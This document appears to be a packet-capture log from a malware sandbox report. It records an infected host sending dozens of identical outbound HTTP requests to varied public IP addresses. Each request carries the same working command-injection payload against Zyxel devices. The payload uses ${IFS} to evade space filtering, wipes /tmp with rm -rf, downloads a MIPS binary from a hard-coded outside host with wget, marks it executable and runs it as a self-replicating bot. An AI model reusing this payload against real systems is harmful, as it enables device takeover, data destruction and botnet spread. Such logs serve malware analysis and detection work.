                              Mar 31, 2024 08:41:24.803385019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3919192.168.2.1341774204.145.54.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803423882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3920192.168.2.1347800202.172.224.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803477049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3921192.168.2.1350340124.226.224.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803503990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3922192.168.2.1351800218.114.41.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803523064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3923192.168.2.1345824129.192.181.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803544998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3924192.168.2.1333406125.192.19.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803605080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3925192.168.2.134340885.86.179.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803627968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3926192.168.2.135493087.188.87.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803651094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3927192.168.2.133924490.104.89.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803714991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3928192.168.2.133843669.76.10.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803734064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3929192.168.2.13485288.6.200.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803774118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3930192.168.2.134437450.23.214.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803818941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3931192.168.2.135687427.59.156.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803828001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3932192.168.2.1345266197.59.82.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803867102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3933192.168.2.134494619.216.2.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803894043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3934192.168.2.134923084.131.128.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803900957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3935192.168.2.1356318117.189.2.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803942919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3936192.168.2.1357374132.177.99.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.803972006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3937192.168.2.133783238.94.173.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804002047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3938192.168.2.134483499.97.34.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804029942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3939192.168.2.133825438.123.240.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804070950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3940192.168.2.13363661.61.255.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804105997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3941192.168.2.135959252.105.90.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804168940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3942192.168.2.1340702162.218.89.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804207087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3943192.168.2.1359962106.150.162.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804227114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3944192.168.2.134337849.106.13.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804244995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3945192.168.2.133833843.22.56.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804287910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3946192.168.2.1354056186.161.49.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804311991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3947192.168.2.1339734183.241.14.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804348946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3948192.168.2.133367260.27.238.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804358006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3949192.168.2.1346838200.73.80.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804409981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3950192.168.2.1359866175.129.150.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804438114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3951192.168.2.134485870.101.224.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804471970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3952192.168.2.1352864122.72.182.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804523945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3953192.168.2.1343278126.190.5.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804547071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3954192.168.2.1337764193.191.203.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804586887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3955192.168.2.134592079.80.5.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804621935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3956192.168.2.133946442.133.42.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804650068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3957192.168.2.134908497.250.51.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804666996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3958192.168.2.1354796197.237.115.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804703951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3959192.168.2.1341206103.46.131.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804750919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3960192.168.2.135276853.251.203.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804780960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3961192.168.2.135387637.27.159.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804812908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3962192.168.2.1341330216.204.174.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804843903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3963192.168.2.1355250138.180.233.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804874897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3964192.168.2.134611083.69.73.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804898977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3965192.168.2.133324063.28.237.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804927111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3966192.168.2.1335188222.206.218.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.804965019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3967192.168.2.134708625.65.65.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805001020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3968192.168.2.1351962142.139.178.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805028915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3969192.168.2.1335148193.177.134.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805042982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3970192.168.2.1350794136.213.166.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805092096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3971192.168.2.135584040.14.96.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805147886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3972192.168.2.1360800144.29.76.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805179119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3973192.168.2.136029032.108.4.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805218935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3974192.168.2.1352562167.106.72.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805248976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3975192.168.2.133465894.164.246.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805269003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3976192.168.2.1352296179.189.57.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805311918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3977192.168.2.1350594201.121.116.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805340052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3978192.168.2.1351952123.0.88.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805340052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3979192.168.2.1334032221.51.247.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805388927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3980192.168.2.1338918101.147.72.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805423975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3981192.168.2.133874480.134.69.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805457115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3982192.168.2.135761868.109.59.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805481911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3983192.168.2.1336644159.208.255.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805521965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3984192.168.2.134240071.12.10.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805552959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3985192.168.2.136087047.211.222.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805599928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3986192.168.2.1350122181.152.128.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805629969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3987192.168.2.1339134100.229.152.42443
                              TimestampBytes transferredDirectionData
